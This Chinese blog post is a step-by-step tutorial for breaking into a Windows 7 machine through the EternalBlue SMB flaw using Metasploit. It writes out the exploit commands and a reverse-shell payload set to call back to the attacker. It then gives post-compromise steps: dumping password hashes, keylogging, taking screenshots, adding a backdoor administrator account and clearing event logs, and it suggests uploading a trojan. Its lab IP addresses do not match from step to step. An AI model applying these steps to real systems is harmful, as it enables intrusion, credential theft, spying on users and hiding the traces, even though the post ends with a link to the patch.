入侵445端口-永恒之蓝漏洞利用-Metasploit

永恒之蓝

 

WannaCry勒索软件中,利用了NSA泄露工具中的“永恒之蓝”漏洞

445端口就是永恒之蓝的入口

我们利用kali里面的Metapsloit工具进行渗透测试(不知道Metasploit百度一下)

测试环境如下

kali的IP:192.168.113.166

win7靶机IP:192.168.84.130

利用模块:ms17_010_eternalblue

 

1.kali打开Metasploit

1.在终端输入(输入几个字母按Tab键可以自动补全)

msfconsole

2019-11-04 08-18-41 的屏幕截图.png

2.打开模块(输入几个字母按Tab键可以自动补全)

use exploit/windows/smb/ms17_010_eternalblue

2019-11-04 08-20-00 的屏幕截图.png

3.设置输入win7靶机IP地址

set RHOSTS 192.168.9.51

2019-11-04 08-22-50 的屏幕截图.png

4.设置攻击负载模块

set payload windows/x64/meterpreter/reverse_tcp

2019-11-04 08-23-46 的屏幕截图.png

5.设置kali的IP

set LHOST 192.168.119.98

2019-11-04 08-25-07 的屏幕截图.png

6.设置监听端口

set LPORT 5555

2019-11-04 08-25-30 的屏幕截图.png

 

7.开始执行模块

exploit

2019-11-04 08-25-54 的屏幕截图.png

8.成功入侵win7靶机

2019-11-04 08-26-46 的屏幕截图.png

(1)我们可以查看他的账户密码的加密值

hashdump

2019-11-04 08-27-05 的屏幕截图.png

 

(2)我们也可以查看他目前屏幕在做什么

screenhot

2019-11-04 08-27-39 的屏幕截图.png

(3)也可以记录他的键盘

keyscan_start 

下载键盘记录

keyscan_dump 

或者上传个木马之类的,总之有很多功能来利用,具体的可以百度查查

(4)获取该计算机已经登陆的账户密码

Kerberos

(5)开启3389端口

 

(6)获取该计算机的超级管理员权限

shell

2019-11-04 08-28-50 的屏幕截图.png

然后可以执行cmd命令

添加一个帐号

net user test 123456 /add

2019-11-04 08-30-17 的屏幕截图.png

升级为管理员帐号

2019-11-04 08-33-49 的屏幕截图.png

也可以执行一些你想要的命令

exit  //退出shell
clearev    //清楚操作日志

2019-11-04 08-35-23 的屏幕截图.png

 

 

445端口永恒之蓝,是个非常危险的漏洞,如果你计算机上也有这个漏洞,不想被看光隐私的话不妨打个补丁

http://www.catalog.update.microsoft.com/search.aspx?q=kb4012212

 

--小顾

本博客所有文章如无特别注明均为原创。作者:GS小顾复制或转载请以超链接形式注明转自 世纪博客
原文地址《入侵445端口-永恒之蓝漏洞利用-Metasploit
分享到:更多

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)